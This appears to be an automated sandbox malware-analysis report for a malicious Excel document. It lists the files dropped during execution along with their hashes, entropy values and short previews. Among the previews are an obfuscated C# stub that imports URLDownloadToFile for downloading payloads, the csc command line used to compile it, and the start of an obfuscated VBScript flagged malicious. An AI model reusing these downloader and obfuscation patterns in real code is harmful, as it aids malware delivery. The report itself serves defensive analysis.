                                                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...3.w.1.s.x.m.q.s...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...3.w.1.s.x.m.q.s...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview:1
                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Fri Oct 25 17:51:06 2024, 1st section name ".debug$S"
                                                                                            Category:dropped
                                                                                            Size (bytes):1328
                                                                                            Entropy (8bit):3.991286959097874
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:HnOe9EurZiLZdHw8wKdNWI+ycuZhNEakSQPNnqSqd:7rZiLQDKd41ulEa3IqSK
                                                                                            MD5:43850047E649A910C5C38E4324333916
                                                                                            SHA1:4C78293FB51C74BD2A132FE29A1EE287A711C0BC
                                                                                            SHA-256:65E2F18B4EB36D21F3E4D92893DEBCE1D110126F34751C3E6541898B9C0518C5
                                                                                            SHA-512:BD66CA3E0B0D7E3AFC325444B28BF12DD3E1F4DDF2C3BC95CB60DC0F41E190B5CA59BBC023C19EC73959B765224E3F8610F967A885425B7203EB4D6B32DD957F
                                                                                            Malicious:false
                                                                                            Preview:L......g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\lwndurzh\CSCC4D24F44B33B435588447526C34E647.TMP...................w.N_#P. Q[.U...........4.......C:\Users\user\AppData\Local\Temp\RES7AEA.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...l.w.n.d.u.r.z.h...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Fri Oct 25 17:51:12 2024, 1st section name ".debug$S"
                                                                                            Category:dropped
                                                                                            Size (bytes):1328
                                                                                            Entropy (8bit):4.010035046591499
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:HYe9E2U5igTXdHMwKdNWI+ycuZhNgkFakS5kqPNnqSqd:AnZzKd41ulgkFa35kGqSK
                                                                                            MD5:9AB878C04F3E6466AFA4FAFADCBA313A
                                                                                            SHA1:C308FF5CD3BB43BF9F638F76CCCADDD7D28072EE
                                                                                            SHA-256:6634E0B70D0A0B4F576CB1F380F56806E54D30238707116EE5987CF991BCF2FF
                                                                                            SHA-512:5F8322902A290B2C4BD746C5591DC7D286202D01760202CAEA25DF03793EE30C5D7DCF723AC4FB886D4744D6DD4962040320FA67019655115327370B2E50B5B6
                                                                                            Malicious:false
                                                                                            Preview:L......g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\3w1sxmqs\CSC4FC5C9177C1B495AB64B9617174E2B9E.TMP................e[....../}...!..........4.......C:\Users\user\AppData\Local\Temp\RES9251.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...3.w.1.s.x.m.q.s...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview:1
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview:1
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview:1
                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                            File Type:MSVC .res
                                                                                            Category:dropped
                                                                                            Size (bytes):652
                                                                                            Entropy (8bit):3.096720085443657
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryz+ak7YnqqufPN5Dlq5J:+RI+ycuZhNEakSQPNnqX
                                                                                            MD5:1A8D07778E4E5F2350F420515B83551D
                                                                                            SHA1:378D0F18B40FEE7DE866C70A2400CA361CE26416
                                                                                            SHA-256:0DD4338F0AE1DC5C50F642EA7EA49DC0A110CBF20761ADE389A560CAC63A8E83
                                                                                            SHA-512:424EC638133F0809FFBCC2E913B1847ADC6A510051618D2216D8AFFE6F1CE5149A3B3259E585EE69302DD70A07B8DB5C3DFBFB11CF5882A54C03E9F6C6D19C45
                                                                                            Malicious:false
                                                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...l.w.n.d.u.r.z.h...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...l.w.n.d.u.r.z.h...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (357)
                                                                                            Category:dropped
                                                                                            Size (bytes):480
                                                                                            Entropy (8bit):3.9787141625870177
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:V/DsYLDS81zuH0qiwPMmHnQXReKJ8SRHy4HOCluVmmZOe/o2Iy:V/DTLDfuH05tXfH6ysXIy
                                                                                            MD5:CE22E90871744B25A04AC8C5691F49CC
                                                                                            SHA1:BC0A93C1FE61E00DAA34774994B638D19F735228
                                                                                            SHA-256:3B955E3C74519870AACEF3876B7CDC4420F0B77D2D09937B7385E8B578F26546
                                                                                            SHA-512:5F13AF44F2219D050D04658808B287BCB9C948765A1ACA148AB148E0981087AB22D6B5AF9FA74360B41A7322B9009858CF25E480A579B16FC8BD62C9B72D0F88
                                                                                            Malicious:false
                                                                                            Preview:.using System;.using System.Runtime.InteropServices;..namespace DZVrARMdWah.{. public class UbTbpiKe. {. [DllImport("UrlmON", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr btGlUjs,string cDSFYG,string eDacYyTYYCQ,uint BkZoE,IntPtr AjQtbauHqbT);.. }..}.
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):369
                                                                                            Entropy (8bit):5.2392598612995
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23f31x0zxs7+AEszIP23f31xz9:p37Lvkmb6Kzvn0WZEovnz9
                                                                                            MD5:F4CC4D7599CDF5D35B4591435DDADFCF
                                                                                            SHA1:78D6262ED7CDB2329969C4E643226BFD2FBB3C62
                                                                                            SHA-256:BDD2903F97BA986EEBEB82FBA42D4F95220D18413CCA8E3BDC13AFDB8ECA4F48
                                                                                            SHA-512:F24492C02AB832CD04016909E9602C59E4D3EDAC9FEE721EA407CFF2B5E4F74AF58C2A0149D96C4BF6F8D9B44B856F408AE064320C754F1D09752D156DB1F819
                                                                                            Malicious:true
                                                                                            Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.0.cs"
                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):3072
                                                                                            Entropy (8bit):2.8749873414041844
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:etGStFEp2YYnl8cPkSy1J63VttkZfgR6rq4lWI+ycuZhNEakSQPNnq:6HY8+gy1cFoJgIrqF1ulEa3Iq
                                                                                            MD5:B9B04381CC28A3D5304A871C8D0B5D77
                                                                                            SHA1:556C02E553F582BC1ADFC66CAF25B4FEB2CFE1D0
                                                                                            SHA-256:09E6E299C343471CCDA85E45DFA0A2CD9ABA73C920B26BE2BD35BAD6FE698A24
                                                                                            SHA-512:9D9F1F74AEAEEEB4F363CAA2BAF7536F634B321188E412D58EADB8710B2A860B45D083D84F42795278F21B82DAC8F8B142D7CC6CAA7CDDEB9751B2AF9C16189F
                                                                                            Malicious:false
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g...........!.................#... ...@....... ....................................@.................................h#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~......(...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................<.5....................................... .............. C.....P ......U.........[.....c.....j.....v.....|...U.....U...!.U.....U.......!.....*.!.....C.......................................,..........<Module>.lw
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                            Category:modified
                                                                                            Size (bytes):866
                                                                                            Entropy (8bit):5.329902570324342
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:AId3ka6KzNEo8KaMD5DqBVKVrdFAMBJTH:Akka60NEo8KdDcVKdBJj
                                                                                            MD5:3B932E29F418E97D480442FAE865BF5B
                                                                                            SHA1:44C6660682F95590271EC26A077697E297DFD3CF
                                                                                            SHA-256:3E7638C31185869B73F46DE222B4F2EC3B7822750C277E7A148527027E1A80ED
                                                                                            SHA-512:4F86F7CB4A56DA3A27EB96837FAF11B5FBD03A9DD1FFA122924597E7A73A49388193CB2FB8F43A69C0CF7CC1C748BFA016106C42880E0ECCE964437D27D0760F
                                                                                            Malicious:false
                                                                                            Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\lwndurzh\lwndurzh.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview:1
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview:1
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview:1
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview:1
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview:1
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview:1
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):512
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3::
                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                            Malicious:false
                                                                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):512
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3::
                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                            Malicious:false
                                                                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):512
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3::
                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                            Malicious:false
                                                                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                            File Type:very short file (no magic)
                                                                                            Category:dropped
                                                                                            Size (bytes):1
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:U:U
                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                            Malicious:false
                                                                                            Preview:1
                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):46
                                                                                            Entropy (8bit):1.0424600748477153
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:/lbWwWl:sZ
                                                                                            MD5:3B7B4F5326139F48EFA0AAE509E2FE58
                                                                                            SHA1:209A1CE7AF7FF28CCD52AE9C8A89DEE5F2C1D57A
                                                                                            SHA-256:D47B073BF489AB75A26EBF82ABA0DAB7A484F83F8200AB85EBD57BED472022FC
                                                                                            SHA-512:C99D99EA71E54629815099464A233E7617E4E118DD5B2A7A32CF41141CB9815DF47B0A40D1A9F89980C307596B53DD63F76DD52CF10EE21F47C635C5F68786B5
                                                                                            Malicious:false
                                                                                            Preview:........................................user.
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):139408
                                                                                            Entropy (8bit):3.700015256114386
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:5S7Ngt5pSGw2yzrgYvQw7ZweRFdvTtLALWdkj:EgmQowexvxHdkj
                                                                                            MD5:74339D80989D10693DBC1115D1CF3EB4
                                                                                            SHA1:BD9B4DEA8D68DB3261E4EB23A9DFE857D0F9EE44
                                                                                            SHA-256:A73C93345D81B888FE37255ABC545DCDB3470B4F0BD59654E4B398C87BE6B64D
                                                                                            SHA-512:4BEFE3383549FB2048E9617430B284F8B62CCE46FA4998A62122E7ED4349357AD9B11C0A0819C40467CE3B2CA7648222B1714E3745A4E74F50FAE3D569CAA1BA
                                                                                            Malicious:true
                                                                                            Preview:..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .C.r.e.a.t.e.S.e.s.s.i.o.n.(.w.s.m.a.n.,. .c.o.n.S.t.r.,. .o.p.t.D.i.c.,. .e.s.t.i.c.a.)..... . . . .d.i.m. .g.r.a.f.i.t.a.r.F.l.a.g.s..... . . . .d.i.m. .c.o.n.O.p.t. ..... . . . .d.i.m. .g.r.a.f.i.t.a.r..... . . . .d.i.m. .a.u.t.h.V.a.l..... . . . .d.i.m. .e.n.c.o.d.i.n.g.V.a.l..... . . . .d.i.m. .e.n.c.r.y.p.t.V.a.l..... . . . .d.i.m. .p.w..... . . . .d.i.m. .t.o.u.t..... . . . .'. .p.r.o.x.y. .i.n.f.o.r.m.a.t.i.o.n..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m.V.a.l..... . . . .d.i.m. .p.r.o.x.y.U.s.e.r.n.a.m.e..... . . . .d.i.m. .p.r.o.x.y.P.a.s.s.w.o.r.d..... . . . . ..... . . . .g.r.a.f.i.t.a.r.F.l.a.g.s. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l. .=. .0..... . . . .p.r.o.x.
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Oct 25 18:51:02 2024, Security: 1
                                                                                            Category:dropped
                                                                                            Size (bytes):1072128
                                                                                            Entropy (8bit):7.365514454019629
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:XmzHJEyfN1YpNBPF39MZEAD3DERnLRmF8DcGLq6DrI2CxKvsWBJWk5klsRx1EYNN:+hfgp531AbARM8wgqISK5JZils71B
                                                                                            MD5:50A169B3A84611E2A50546C48C417A4C
                                                                                            SHA1:3807B542FAFFB066F25864BE1A318832F962D1C0
                                                                                            SHA-256:F8BFD91A161A81CEF44C2361382F139C2F9C5B178E4FED987BAED6CE9A9E3BE9
                                                                                            SHA-512:B2143FF6E76AFA18239C5AC459C66CC70723ECFAAEF6755FD7FF2279747F110E3020FD521334E896B7B41E98DF16316B2F911515CF0E2E0F9909732C014AD91A
                                                                                            Malicious:false
                                                                                            Preview:......................>.......................................................................7...............................c.......e................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):26
                                                                                            Entropy (8bit):3.95006375643621
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
